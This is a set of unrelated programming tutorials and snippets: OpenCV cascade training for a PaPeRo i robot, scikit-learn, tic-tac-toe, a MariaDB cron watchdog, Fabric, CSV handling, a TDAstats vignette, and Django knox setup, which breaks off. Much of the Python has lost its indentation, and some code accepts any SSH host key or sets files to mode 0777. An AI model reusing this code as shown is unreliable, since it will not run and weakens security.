For the positive images there are two approaches: prepare multiple images yourself, or automatically generate several images from a single one during training preparation. To save effort, we take the latter approach here.
More negative images would normally be better as well, but this time we will try with 30.
The images were created by cropping PaPeRo i's face from the pamphlet published on the PaPeRo i application introduction page for the positive image, and by cropping parts not containing PaPeRo i from the same pamphlet and from simulator screenshots for the negative images.
Also, since there is only one source positive image, I was concerned that the background might be interpreted as part of the face during training, so I filled the background with white before using it.
Procedure (on the Raspberry Pi)
(1) Create the working directories.
$ cd ~/papero
$ mkdir traincascade
$ cd traincascade
$ mkdir pos
$ mkdir vec
$ mkdir neg
$ mkdir cascade
$ cd cascade
$ mkdir paperoi
After creating the directories, place the positive image (paperoi.png) under ~/papero/traincascade/pos and the negative images (img001.png–img030.png) under ~/papero/traincascade/neg.
At this point the directory structure looks like this:
~/
  papero/
    pypapero.py
    traincascade/
      pos/
        paperoi.png
      vec/
      neg/
        img001.png
        img002.png
        ...
        img030.png
      cascade/
        paperoi/
(2) Vectorize the positive image with opencv_createsamples.
$ cd ~/papero/traincascade
$ opencv_createsamples -img ./pos/paperoi.png -vec ./vec/paperoi.vec -bgcolor 255 -num 50
The -num 50 option internally generates 50 images in which the source image paperoi.png is randomly rotated about the X, Y and Z axes within the default ranges, and a single vector file, paperoi.vec, is then generated from those images.
If you run this from a terminal opened on the Raspberry Pi desktop,
$ opencv_createsamples -img ./pos/paperoi.png -vec ./vec/paperoi.vec -num 50 -bgcolor 255 -show
adding the -show option as above lets you view the internally generated images. The images are shown one at a time; press Enter to advance to the next one.
(3) Create the list of negative images.
$ find ./neg -name "*.png" > nglist.txt
(4) Run the training and generate the trained cascade.
$ opencv_traincascade -data ./cascade/paperoi/ -vec ./vec/paperoi.vec -bg ./nglist.txt -numPos 45 -numNeg 30
The number after -numPos specifies the number of positive images. If you specify 50, the total number of images in paperoi.vec, an error occurs when some of the images are judged unsuitable as positive samples, so 45 (90%) is specified instead.
Once training starts, its progress is displayed as shown below.
PARAMETERS:
cascadeDirName: ./cascade/paperoi/
vecFileName: ./vec/paperoi.vec
bgFileName: ./nglist.txt
numPos: 45
numNeg: 30
numStages: 20
precalcValBufSize[Mb] : 1024
precalcIdxBufSize[Mb] : 1024
acceptanceRatioBreakValue : -1
stageType: BOOST
featureType: HAAR
sampleWidth: 24
sampleHeight: 24
boostType: GAB
minHitRate: 0.995
maxFalseAlarmRate: 0.5
weightTrimRate: 0.95
maxDepth: 1
maxWeakCount: 100
mode: BASIC
Number of unique features given windowSize [24,24] : 162336
===== TRAINING 0-stage =====
<BEGIN
POS count : consumed 45 : 45
NEG count : acceptanceRatio 30 : 1
Precalculation time: 1
+----+---------+---------+
| N | HR | FA |
+----+---------+---------+
| 1| 1| 0|
+----+---------+---------+
END>
Training until now has taken 0 days 0 hours 0 minutes 3 seconds.
===== TRAINING 1-stage =====
<BEGIN
POS count : consumed 45 : 45
NEG count : acceptanceRatio 30 : 0.148515
Precalculation time: 1
+----+---------+---------+
| N | HR | FA |
+----+---------+---------+
| 1| 1| 0|
+----+---------+---------+
END>
Training until now has taken 0 days 0 hours 0 minutes 7 seconds.
...
===== TRAINING 6-stage =====
<BEGIN
POS count : consumed 45 : 45
NEG count : acceptanceRatio 30 : 3.83055e-06
Precalculation time: 0
+----+---------+---------+
| N | HR | FA |
+----+---------+---------+
| 1| 1| 0|
+----+---------+---------+
END>
Training until now has taken 0 days 0 hours 6 minutes 14 seconds.
===== TRAINING 7-stage =====
<BEGIN
POS count : consumed 45 : 45
NEG count : acceptanceRatio 0 : 0
Required leaf false alarm rate achieved. Branch training terminated.
When training completes, a file named cascade.xml is generated under ./cascade/paperoi/, the directory specified with the -data option.
Also, if you abort training with Ctrl+C, intermediate files remain under ./cascade/paperoi/, so the next time you run opencv_traincascade with the same options, training resumes from the interrupted stage.
Training time seems to vary depending on the images randomly generated by opencv_createsamples, but it took about 5 to 7 minutes.
(5) Copy and paste the following content to create cv_numpaperoi.py and place it under ~/papero.
* Replace the ****username**** and ****password**** parts with the username and password you use to log in to PaPeRo i as a regular user.
import argparse
import time
from enum import Enum
from paramiko import SSHClient,AutoAddPolicy
from scp import SCPClient
import cv2
import pypapero
class State(Enum):
st0 = 10
st1 = 11
st2 = 12
st3 = 13
st4 = 14
end = 999
def main(papero, host, do_show):
prev_time = time.monotonic()
past_time = 0
interval_time = 0
state = State.st0
first = True
print("HOST=" + host)
PORT = 22
USER = "****ユーザ名****"
PSWD = "****パスワード****"
scp = None
ssh = SSHClient()
ssh.set_missing_host_key_policy(AutoAddPolicy())
ssh.connect(host, port=PORT, username=USER, password=PSWD)
scp = SCPClient(ssh.get_transport())
cascade_file = 'traincascade/cascade/paperoi/cascade.xml'
face_cascade = cv2.CascadeClassifier(cascade_file)
num_face_now = 0
num_face = 0
while state != State.end:
messages = papero.papero_robot_message_recv(0.1)
now_time = time.monotonic()
delta_time = now_time - prev_time
prev_time = now_time
if messages is not None:
msg_dic_rcv = messages[0]
else:
msg_dic_rcv = None
if papero.errOccurred != 0:
print("------Error occured(main()). Detail : " + papero.errDetail)
break
if state == State.st0:
papero.send_start_speech("検知したパペロの数を発話します。座布団のボタンで終了します。")
past_time = 0.0
state = State.st1
elif state == State.st1:
past_time += delta_time
if past_time > 0.5:
papero.send_get_speech_status()
state = State.st2
elif state == State.st2:
if msg_dic_rcv is not None:
if msg_dic_rcv["Name"] == "getSpeechStatusRes":
if str(msg_dic_rcv["Return"]) == "0":
state = State.st3
else:
past_time = 0
state = State.st1
elif state == State.st3:
past_time += delta_time
if past_time >= interval_time:
papero.send_take_picture("JPEG", filename="tmp.jpg", camera="VGA")
past_time = 0
state = State.st4
elif state == State.st4:
if msg_dic_rcv is not None:
if msg_dic_rcv["Name"] == "takePictureRes":
scp.get("/tmp/tmp.jpg")
img = cv2.imread("tmp.jpg")
if img is not None:
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
num_face_now = len(faces)
print("num_face_now=" + str(num_face_now))
if num_face_now != num_face:
papero.send_start_speech("パペロは"+str(num_face_now)+"台です")
num_face = num_face_now
if do_show:
for (x,y,w,h) in faces:
cv2.rectangle(img, (x,y), (x+w,y+h), (255,0,0), 2)
cv2.imshow('image', img)
cv2.waitKey(1)
state = State.st3
if msg_dic_rcv is not None:
if msg_dic_rcv["Name"] == "detectButton":
state = State.end
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = "Usage:")
parser.add_argument("host", type=str, help = "Host IP address")
parser.add_argument("-img", help = "Display image", action='store_true')
command_arguments = parser.parse_args()
simulator_id = ""
robot_name = ""
host = command_arguments.host
do_show = command_arguments.img
ws_server_addr = "ws://" + host + ":8088/papero"
papero = pypapero.Papero(simulator_id, robot_name, ws_server_addr)
main(papero, host, do_show)
papero.papero_cleanup()
In cv_numface.py, which we created in "Having PaPeRo i count human faces with OpenCV on a Raspberry Pi", the cascade_file used in
face_cascade = cv2.CascadeClassifier(cascade_file)
was assigned as
cascade_file = '/usr/local/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml'
whereas in this article's cv_numpaperoi.py it is assigned as
cascade_file = 'traincascade/cascade/paperoi/cascade.xml'
so that the cascade.xml generated by the training above is used.
The spoken lines have also been changed slightly to match the new object being counted.
(6) Run cv_numpaperoi.py.
$ cd ~/papero
$ python3 cv_numpaperoi.py <PaPeRo i IP address>
When run, PaPeRo i first says "検知したパペロの数を発話します。座布団のボタンで終了します。" ("I will announce the number of PaPeRos detected. Press the cushion button to exit."), then counts the PaPeRo i faces recognized by the camera and speaks the count whenever it changes.
If you run it from a terminal opened on the Raspberry Pi desktop,
$ python3 cv_numpaperoi.py <PaPeRo i IP address> -img
adding the -img option as above displays the image captured by the camera together with the detected face regions.
Results
In this experiment, perhaps because the number of training images was small, showing PaPeRo i a printed document containing PaPeRo i images only produced occasional detections, and all of the PaPeRo i units in the picture were almost never counted.
Possibly because the positive image's background was plain white, recognition was particularly poor for images where PaPeRo i's background was not plain white.
Changing the number of generated images specified with opencv_createsamples' -num option to 100 and 200, and the -numPos value of opencv_traincascade to 90 and 180, did not improve the situation.
As for training time, even with -numPos set to 90, training sometimes completed in about one minute, so more images does not necessarily mean longer training.
This time the positive images were generated from a single picture; adding a few versions with different backgrounds might improve recognition accuracy.
However, if you prepare multiple positive images yourself, you cannot use opencv_createsamples' automatic rotation, so you have to create the rotated images yourself as well.
Increasing the number of images and training on a separate PC
As a test, I set the number of generated images to 1000 with opencv_createsamples' -num option. Creating the vector file succeeded, but when specifying -numPos 900 to opencv_traincascade, the process terminated partway through, presumably due to insufficient memory, and training could not be completed on the Raspberry Pi.
So I ran the training on a separate PC (Windows 10) with OpenCV installed, placed the resulting cascade.xml under ~/papero/traincascade/cascade/paperoi/ on the Raspberry Pi, and ran cv_numpaperoi.py.
Since the source positive image and the negative images were not augmented, recognition still did not improve, but there seems to be no problem using a cascade.xml created on another machine such as a Windows PC on the Raspberry Pi.
If memory or CPU limits make training on the Raspberry Pi problematic, it is a good idea to train on a more capable PC instead.
|
I am training a decision tree with sklearn. When I use:
dt_clf = tree.DecisionTreeClassifier()
the default value of the max_depth parameter is None. According to the documentation, if max_depth is None, nodes are expanded until all leaves are pure or until all leaves contain fewer than min_samples_split samples.
After fitting my model, how can I find out what max_depth actually is? The get_params() function doesn't help. After fitting, get_params() still says None.
How can I get the real number for max_depth?
Docs: https://scikit-learn.org/stable/modules/generated/sklearn.tree.DecisionTreeClassifier.html
Access max_depth on the underlying Tree object:
from sklearn import tree

X = [[0, 0], [1, 1]]
Y = [0, 1]
clf = tree.DecisionTreeClassifier()
clf = clf.fit(X, Y)
print(clf.tree_.max_depth)
>>> 1
You can see more accessible attributes of the underlying tree object using:
help(clf.tree_)
These include max_depth, node_count, and other lower-level parameters.
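On reasonably recent scikit-learn versions (roughly 0.21 and later) there is also a convenience method on the fitted estimator itself:
print(clf.get_depth())  # returns the same depth as clf.tree_.max_depth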
|
Noughts & Crosses Game in 69 lines of Python code
It seems like many people enjoy tutorials about making games. Well, let me make one too! Today we are going to be implementing the legendary "Noughts and Crosses" game in 69 lines of Python code! I am not going to overcomplicate matters with OOP and all that... a few functions will do.
First, let's create three global variables:
# GLOBAL VARIABLES
M = [
['_','_','_'],
['_','_','_'],
['_','_','_']
]
S = True
C = 0
M stores our game's 3 x 3 field. Classic. It is a 2D matrix, so I called it M. S holds the side: when S = True, it's X's turn and vice versa. C holds the number of moves made.
Now, let's write the main function. I called it xo() for simplicity. It has to:
Show an empty board
Start a while loop that will repeat itself until C == 9
Inside the loop, it has to
Ask user to make a move
Check if either of the two players won and, if yes, break out of the loop
If the while loop doesn't encounter a break on its way, it means all 9 moves were made, yet no one won, so it must be a tie!
# MAIN
def xo():
board_show() # FUNCTION NOT YET IMPLEMENTED!
while C < 9:
turn() # FUNCTION NOT YET IMPLEMENTED!
if big_check(): # FUNCTION NOT YET IMPLEMENTED!
print(f"{'X' if not S else 'O'} wins!", end="\n\n")
break
else: # if break not encountered, it must be a tie!
print("It's a tie!", end="\n\n")
The easiest function to implement is board_show(). Just print out our little matrix M. Don't forget to put some empty prints for spacing purposes!
def board_show():
print()
for y in range(3):
print(" ", end="")
for x in range(3):
print(M[y][x], end=" ")
print()
print()
Now, the turn() function is a bit trickier, yet not too complicated either. We want to:
Ask player where he/she wants to place his/her mark
Check if the selected square is free, and if it is, put X or O into it, change the side, and call board_show() to demonstrate the result
If it's not empty, we want to let the user know that the move was invalid and make him repeat it
def turn():
global S, C # allows us to reference S that is not assigned in this scope
pos = [ ( int(i) - 1 ) for i in input("Your move: ").split() ]
# this produces a list of two int values X and Y
# it reduces each one by 1 since computer (unlike human) starts counting from 0
x, y = pos[0], pos[1] # save x and y separately for clearance
if M[y][x] == '_':
M[y][x] = 'X' if S else 'O'
S = not S
C += 1 # increment move counter C by 1 only if the move is valid
board_show()
else:
print("Invalid move!")
Now that we have our turn() function nice and shining, we only need the big_check() function, only it's not so easy. The big_check() isn't called big for no reason -- it consists of three other functions:
check_hr(y) checks the yth row
check_vr(x) checks the xth column
check_dig() checks both diagonals
But these are fairly simple, and you will see why in a second. The only thing we need to do is check whether all three positions hold the same character, and that it is not the default '_'.
def check_hr(y):
return M[y][0] == M[y][1] == M[y][2] != '_'
def check_vr(x):
return M[0][x] == M[1][x] == M[2][x] != '_'
def check_dig():
return M[0][0] == M[1][1] == M[2][2] != '_' or \
M[0][2] == M[1][1] == M[2][0] != '_'
Now, let's get to the big_check(). What it does essentially is it checks every row, column, and diagonal using the functions we've just written and if at least one of those function returns True, the whole big_check() function must return True!
def big_check():
win = False
for i in range(3):
if check_hr(i) or check_vr(i):
win = True
if check_dig():
win = True
return win
"Now we have everything! It's complete!" -- a newbie would say, but no, it's actually not. There is one last bit to it that will finally make it work -- the 69th line:
xo() # invoke the xo() function
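For illustration, the start of a game might look roughly like this (moves are typed as two numbers, column then row, separated by a space; exact spacing of the board printout may differ slightly in your terminal):

  _ _ _
  _ _ _
  _ _ _

Your move: 2 2

  _ _ _
  _ X _
  _ _ _

Your move: 1 1

  O _ _
  _ X _
  _ _ _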
|
1. Check whether MySQL/MariaDB is running
import MySQLdb
import time
import subprocess
def excuteCommand(com):
ex = subprocess.Popen(com, stdout=subprocess.PIPE, shell=True)
out, err = ex.communicate()
status = ex.wait()
print("cmd in:", com)
print("cmd out: ", out.decode())
return out.decode()
p = subprocess.Popen('netstat -ntlp|grep mysql',shell=True,stdout=subprocess.PIPE)
status = p.stdout.readlines()
print(status)
if not status:
status = excuteCommand('systemctl start mariadb')
print(status)
2. Test
[root@vultr ~]# netstat -ntlp|grep mysql
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 7694/mysqld
[root@vultr ~]# systemctl stop mariadb
[root@vultr ~]# netstat -ntlp|grep mysql
[root@vultr ~]# lsof -i :3306
[root@vultr ~]# /opt/py3/bin/python /u01/mysql_mon.py
[]
[b'tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 8188/mysqld \n']
[root@vultr ~]# netstat -ntlp|grep mysql
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 8188/mysqld
[root@vultr ~]# lsof -i :3306
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
mysqld 8188 mysql 14u IPv4 4367907 0t0 TCP *:mysql (LISTEN)
3. Create a background monitoring job
[root@vultr ~]# crontab -l
*/1 * * * * /opt/py3/bin/python /u01/mysql_mon.py
|
[Fabric] fabric hello print on CentOS 8
Category: * Linux · 2021. 1. 11. 17:19
Test environment
$ cat /etc/redhat-release
CentOS Linux release 8.1.1911 (Core)
$ python -V
Python 3.6.8
$ fab -V
Fabric 2.5.0
Paramiko 2.7.2
Invoke 1.5.0
Editing fabfile.py
$ vim fabfile.py
from fabric import task
@task
def hello(ctx):
print("hello world.")
Running fab
fab hello
$ fab --list
Available tasks:
  hello

$ fab hello
hello world.
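Tasks can also run commands on remote hosts over SSH; a minimal sketch is shown below (the host address and user are placeholders, assuming SSH access is already configured):
from fabric import Connection, task

@task
def uptime(ctx):
    # 192.0.2.10 is a placeholder address
    with Connection("user@192.0.2.10") as c:
        c.run("uptime")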
|
Just like the clothes you wear, the code you write will also reflect your personal style.
Let's get fancy, shall we?
B4X:
'Ugly:
Dim validation As Boolean
Dim sum = 1 + 1 As Int
If sum = 2 Then validation = True
'Elegant:
Dim sum = 1 + 1 As Int
Dim validation = (sum = 2) As Boolean
B4X:
'Ugly:
a = a + 1
If a >= 100 then a = 100
'Elegant:
a = min(a + 1, 100)
B4X:
'Ugly:
a = a - 1
If a <= 0 then a = 0
'Elegant:
a = max(a - 1, 0)
Do you have some more fancy examples of elegant B4X code?
Share it with us!
|
import locale
locale.setlocale(locale.LC_NUMERIC, 'C')
import signal , time , sys , os, shutil
import pygtk
pygtk.require( '2.0' )
import gtk
import gobject
import time
import common.Config as Config
from common.Util.CSoundClient import new_csound_client
from common.Util.Profiler import TP
from Jam.JamMain import JamMain
from common.Util.Trackpad import Trackpad
from gettext import gettext as _
import commands
from sugar.activity import activity
class TamTamJam(activity.Activity):
def __init__(self, handle):
# !!!!!! initialize threading in gtk !!!!!
# ! this is important for the networking !
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
gtk.gdk.threads_init()
activity.Activity.__init__(self, handle)
for snd in ['mic1','mic2','mic3','mic4']:
if not os.path.isfile(os.path.join(Config.DATA_DIR, snd)):
shutil.copyfile(Config.SOUNDS_DIR + '/' + snd , Config.DATA_DIR + '/' + snd)
os.system('chmod 0777 ' + Config.DATA_DIR + '/' + snd + ' &')
color = gtk.gdk.color_parse(Config.WS_BCK_COLOR)
self.modify_bg(gtk.STATE_NORMAL, color)
self.set_title('TamTam Jam')
self.set_resizable(False)
self.trackpad = Trackpad( self )
self.preloadTimeout = None
self.connect('notify::active', self.onActive)
self.connect('destroy', self.onDestroy)
#load the sugar toolbar
toolbox = activity.ActivityToolbox(self)
self.set_toolbox(toolbox)
self.activity_toolbar = toolbox.get_activity_toolbar()
toolbox.show()
self.trackpad.setContext('jam')
self.jam = JamMain(self)
self.connect('key-press-event', self.jam.onKeyPress)
self.connect('key-release-event', self.jam.onKeyRelease)
#self.modeList[mode].regenerate()
self.set_canvas( self.jam )
self.jam.onActivate(arg = None)
self.show()
def onPreloadTimeout( self ):
if Config.DEBUG > 4: print "TamTam::onPreloadTimeout", self.preloadList
t = time.time()
if self.preloadList[0].load( t + 0.100 ): # finished preloading this object
self.preloadList.pop(0)
if not len(self.preloadList):
if Config.DEBUG > 1: print "TamTam::finished preloading", time.time() - t
self.preloadTimeout = False
return False # finished preloading everything
if Config.DEBUG > 4: print "TamTam::preload returned after", time.time() - t
return True
def onActive(self, widget = None, event = None):
if widget.props.active == False:
Config.logwrite(1, 'Jam.onActivate disconnecting csound')
csnd = new_csound_client()
csnd.connect(False)
else:
Config.logwrite(1, 'Jam.onActivate connecting csound')
csnd = new_csound_client()
csnd.connect(True)
def onKeyPress(self, widget, event):
pass
def onKeyRelease(self, widget, event):
pass
def onDestroy(self, arg2):
if Config.DEBUG: print 'DEBUG: TamTam::onDestroy()'
self.jam.onDestroy()
csnd = new_csound_client()
csnd.connect(False)
csnd.destroy()
gtk.main_quit()
def ensure_dir(self, dir, perms=0777, rw=os.R_OK|os.W_OK):
if not os.path.isdir( dir ):
try:
os.makedirs(dir, perms)
except OSError, e:
print 'ERROR: failed to make dir %s: %i (%s)\n' % (dir, e.errno, e.strerror)
if not os.access(dir, rw):
print 'ERROR: directory %s is missing required r/w access\n' % dir
def read_file(self,file_path):
self.jam.handleJournalLoad(file_path)
def write_file(self,file_path):
self.jam.handleJournalSave(file_path)
|
To learn about the basics of permutation tests and statistical resampling from an excellent textbook, see @resampling-book. For a primer on hypothesis testing with permutation tests in the context of topological data analysis, see @hyptest. Since the distribution of topological features has not been well characterized yet, statistical inference on persistent homology must be nonparametric. Given two sets of data, \(X\) and \(Y\), conventional statistical inference generally involves comparison of the parameters of each population with the following null and alternative hypotheses:
\[ \begin{aligned} H_0&: \mu_X=\mu_Y \\ H_A&: \mu_X\neq\mu_Y \end{aligned} \] If we define a function \(T\) that returns the persistent homology of a point cloud, then given two point clouds, \(C\) and \(D\), we can use a permutation test to conduct analogous statistical inference with the following null and alternative hypotheses:
\[\begin{aligned} H_0&: T(C)=T(D) \\ H_A&: T(C)\neq T(D)\end{aligned}\] TDAstats uses the Wasserstein distance (aka Earth-mover's distance) as a similarity metric between the persistent homologies of two point clouds [@wasserstein-calc]. Although visual analysis of plots (topological barcodes and persistence diagrams) is essential, a formal statistical procedure adds objectivity to the analysis. The case study below highlights the main features of TDAstats pertaining to statistical inference. For practice, apply the steps of the case study to the unif3d and sphere3d datasets.
unif2d versus circle2d
To ensure that all the code output in this section is reproducible, we set a seed for R's pseudorandom number generator. We are also going to need the unif2d and circle2d datasets provided with TDAstats, so we load them right after setting the seed.
# ensure reproducible results
set.seed(1)
# load TDAstats
library("TDAstats")
# load relevant datasets for case study
data("unif2d")
data("circle2d")
The unif2d dataset is a numeric matrix with 100 rows and 2 columns containing the Cartesian x- and y-coordinates (columns 1 and 2, respectively) for 100 points (1 per row). The points are uniformly distributed within the unit square with corners \((0, 0)\), \((0, 1)\), \((1, 1)\), and \((1, 0)\). We confirm this with the following scatterplot.
# see if points in unif2d are actually distributed
# within a unit square as described above
plot(unif2d, xlab = "x", ylab = "y",
main = "Points in unif2d")
The points do appear uniformly distributed as described above. Next, we take a look at the circle2d dataset, which is also a numeric matrix with 100 rows and 2 columns. However, circle2d contains the Cartesian x- and y-coordinates for 100 points uniformly distributed on the circumference of a unit circle centered at the origin. Like we did with unif2d, we confirm this with a scatterplot.
# see if points in circle2d are actually distributed
# on the circumference of a unit circle as described
plot(circle2d, xlab = "x", ylab = "y",
main = "Points in circle2d")
The points indeed appear to be uniformly distributed on a unit circle.
Before we use a permutation test to see if unif2d and circle2d exhibit distinct persistent homologies, we should take a look at the topological barcodes of each. Since we have 2-dimensional data, we are primarily concerned with the presence of 0-cycles and 1-cycles. If points were connected to each other by edges in a distance-dependent manner, then the resulting graphs (assuming a “good” distance-dependence) for unif2d and circle2d would have a single major component. Thus, we do not expect interesting behavior in the 0-cycles for either dataset. There also does not appear to be a prominent 1-cycle for the points in unif2d. However, the circle2d dataset was intentionally designed to have a single prominent 1-cycle containing all the points in the dataset. Thus, when we plot the topological barcodes for circle2d we should see a persistent 1-cycle that we do not see in the barcode for unif2d. We confirm our expectations with the following code.
# calculate homologies for both datasets
unif.phom <- calculate_homology(unif2d, dim = 1)
circ.phom <- calculate_homology(circle2d, dim = 1)
# plot topological barcodes for both datasets
plot_barcode(unif.phom)
plot_barcode(circ.phom)
We note two aspects of the topological barcodes above: (1) the limits of the horizontal axis are very different, making direct comparison difficult; (2) it could be confusing to tell which barcode corresponds to which dataset. To fix these issues and demonstrate how the topological barcodes can be modified with ggplot2 functions (plot_barcode returns a ggplot2 object), we run the following code.
# load ggplot2
library("ggplot2")
# plot barcodes with labels and identical axes
plot_barcode(unif.phom) +
ggtitle("Persistent Homology for unif2d") +
xlim(c(0, 2))
> Scale for 'x' is already present. Adding another scale for 'x', which
> will replace the existing scale.
plot_barcode(circ.phom) +
ggtitle("Persistent Homology for circle2d") +
xlim(c(0, 2))
> Scale for 'x' is already present. Adding another scale for 'x', which
> will replace the existing scale.
We can safely ignore the warnings printed by ggplot2. Rescaling the horizontal axis had two major effects. First, we notice that the 0-cycles which appeared far more persistent for unif2d than for circle2d are now comparable. Second, the 1-cycles in unif2d are not persistent after the rescaling operation. Since the only prominent 1-cycle is now in circle2d, our expectations with respect to the topological barcodes were correct. We can now run a permutation test on the two datasets to confirm that the persistent homologies of the two are, in fact, distinct. To do this, all we have to do is use the permutation_test function in TDAstats, and specify the number of iterations. Increasing the number of iterations improves how well the permutation test approximates the distribution of all point permutations between the two groups, but also comes at the cost of speed. Thus, a number of iterations that is sufficiently large to properly approximate the permutation distribution but not too large to be computed is required. Almost certainly, the ideal number of iterations will change as the available computing power changes.
# run permutation test
perm.test <- permutation_test(unif2d, circle2d, iterations = 100)
# display p-value for 0-cycles
print(perm.test[[1]]$pvalue)
> [1] 0
# display p-value for 1-cycles
print(perm.test[[2]]$pvalue)
> [1] 0
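For reference, the p-value reported for each dimension is a permutation p-value; under the usual convention (an assumption here, since the exact formula is not restated in this vignette), it is the fraction of permuted Wasserstein distances at least as large as the observed one:
\[ p = \frac{1}{N}\sum_{i=1}^{N} I\left(W_i \geq W_{\text{obs}}\right) \]
where \(W_i\) is the Wasserstein distance for the \(i\)-th permutation, \(W_{\text{obs}}\) is the distance for the original group labels, and \(N\) is the number of iterations. A value of 0 simply means that no permutation produced a distance as large as the observed one.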
Note that the printed p-values for each set of cycles are unadjusted p-values. To see how p-values can be adjusted for permutation tests, see @resampling-book. You may also want to look at the null distributions generated by the permutation test for each dimension as follows.
# plot null distribution for 0-cycles as histogram
# and add vertical line at Wasserstein distance
# for original groups
hist(perm.test[[1]]$permvals,
xlab = "Wasserstein distance",
ylab = "Counts",
main = "Null distribution for 0-cycles",
xlim = c(0, 2.5))
abline(v = perm.test[[1]]$wasserstein)
# plot null distribution for 1-cycles as histogram
# and add vertical line at Wasserstein distance
# for original groups
hist(perm.test[[2]]$permvals,
xlab = "Wasserstein distance",
ylab = "Counts",
main = "Null distribution for 1-cycles",
xlim = c(0, 2))
abline(v = perm.test[[2]]$wasserstein)
Given that both vertical lines are far to the right of the plotted histograms (corresponding to the p-values of zero), we can safely conclude that the permutation test has given us sufficient evidence to reject the null hypothesis. Thus, the persistent homologies of unif2d and circle2d appear to be significantly different.
N.B.: persistence diagrams (using the plot_persist function) could replace the topological barcodes above. However, since the vertical and horizontal axes are important in persistence diagrams, the ylim ggplot2 function would also have to be used to rescale axes.
For practice, you can repeat the case study for the unif3d and sphere3d datasets. Keep in mind that the dim parameter in the calculate_homology function would likely have to be changed and that you will have a third permutation distribution generated that would need to be plotted.
|
Jun 14, 2019
Import CSV as Dict
Creates ordered dict
You can increase file size limit
Using next() skips a row (with DictReader the header is already consumed, so here it skips the first data row)
import csv
# Dict reader creates an ordered dict (first row will be headers)
with open('./data/file.csv', newline='') as file:
# Huge csv files might give you a size limit error
csv.field_size_limit(100000000)
results = csv.DictReader(file, delimiter=';', quotechar='*', quoting=csv.QUOTE_ALL)
# next() skips one row; DictReader has already consumed the header row
next(results)
for row in results:
# prints each item in the column with header 'key'
print(row['key'])
Import CSV with No Header (nested lists)
newline='' prevents blank lines
csv.reader uses indexes [0], [1]
# newline='' prevents blank lines
with open('./data/file.csv', newline='') as file:
results = csv.reader(file, delimiter=':', quoting=csv.QUOTE_NONE)
for row in results:
# csv reader uses indexes
print(row[0])
Writing and Creating Headers
Create a csv.writer object
Create header manually before loop
Nested lists are better than tuples inside lists
writer.writerow and writer.writerows
# Creates a csv writer object ('file' is assumed to be an already-opened file object)
writer = csv.writer(
file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
# Write header first if you would like
writer.writerow(['title', 'price', 'shipping'])
''' Tuples inside a list (lists inside lists are usually better, though).
If you're using tuples of variable size, note that a single tuple
will convert to string type in a loop, so indexing it with [0] won't work. '''
products = [['slinky', '$5', 'Free'],
['pogo', '$12', '$6'],
['Yoyo', '$7', '$2']]
# write each row normal
for item in products:
writer.writerow(map(str, item))
# Writes all items into a single row
writer.writerow(sum(products, []))
# Writes all 3 rows
writer.writerows(products)
Using DictWriter for Headers
fieldnames indicates header to object
writer.writeheader() writes those fields
# DictWriter field names will add the headers for you when you call writeheader()
with open("./data/file.csv", "w") as file:
writer = csv.DictWriter(
file, fieldnames=['title', 'price', 'shipping'],
quoting=csv.QUOTE_NONNUMERIC)
writer.writeheader()
writer.writerows([{'title': 'slinky', 'price': '$5', 'shipping': 'Free'},
{'title': 'pogo', 'price': '$12', 'shipping': '$6'},
{'title': 'Yoyo', 'price': '$7', 'shipping': '$2'}])
Bonus - Flatten any List
Function will flatten any level of nested lists
or type == tuple() to catch tuples too
# -- Bonus (Off Topic) --
# You can flatten any list with type checking and recursion
l = [1, 2, [3, 4, [5, 6]], 7, 8, [9, [10]]]
output = []
def flatten_list(l):
for i in l:
if type(i) == list:
flatten_list(i)
else:
output.append(i)
flatten_list(l)
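Following the note above about catching tuples, a variant that also descends into tuples might look like this (a small sketch, not in the original note):
def flatten_any(items, output=None):
    # flattens arbitrarily nested lists and tuples
    if output is None:
        output = []
    for i in items:
        if type(i) in (list, tuple):
            flatten_any(i, output)
        else:
            output.append(i)
    return output

print(flatten_any([1, (2, [3, 4]), [5, [6]]]))  # [1, 2, 3, 4, 5, 6]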
Feb 24, 2019
ALTER TABLE product_que ALTER COLUMN attempts TYPE integer USING attempts::integer;
ALTER TABLE product_que ALTER COLUMN amazon TYPE integer USING amazon::integer;
ALTER TABLE product_que ALTER COLUMN ebay TYPE integer USING ebay::integer;
ALTER TABLE product_que ALTER COLUMN etsy TYPE integer USING etsy::integer;
query = self.session.query(db.ProdQue).filter(or_(db.ProdQue.amazon > 0,
db.ProdQue.ebay > 0, db.ProdQue.etsy > 0)).limit(5000)
|
First, since we need to set up permissions, we're back in Django.
We need to install the django-rest-knox package.
$ (venv) pip install django-rest-knox
settings.py
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'notes',
'rest_framework',
'knox',
]
...
# Add this at the very bottom of the file.
# PAGE_SIZE is set so that only 10 items are fetched at first.
# The default authentication class is set to knox token authentication.
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
'PAGE_SIZE': 10,
'DEFAULT_AUTHENTICATION_CLASSES': ('knox.auth.TokenAuthentication',),
}
$ (venv) python manage.py makemigrations
$ (venv) python manage.py migrate
Now that the default permissions are configured, let's add an owner field to the Notes model.
notes/models.py
from django.db import models
from django.contrib.auth.models import User
class Notes(models.Model):
text = models.CharField(max_length=255)
owner = models.ForeignKey(
User, related_name="notes", on_delete=models.CASCADE, null=True
)
created_at = models.DateTimeField(auto_now=False, auto_now_add=True)
def __str__(self):
return self.text
We import the User model and set it as a foreign key.
Since the model has changed, run the migrations once more.
$ (venv) python manage.py makemigrations
$ (venv) python manage.py migrate
In views.py, instead of fetching every note, we will now fetch notes per owner. And when a note is created, the owner field needs to be filled in, right?
notes/views.py
from rest_framework import viewsets, permissions
from .models import Notes
from .serializers import NoteSerializer
class NoteViewSet(viewsets.ModelViewSet):
permission_classes = [permissions.IsAuthenticated, ]
serializer_class = NoteSerializer
def get_queryset(self):
return self.request.user.notes.all().order_by("-created_at")
def perform_create(self, serializer):
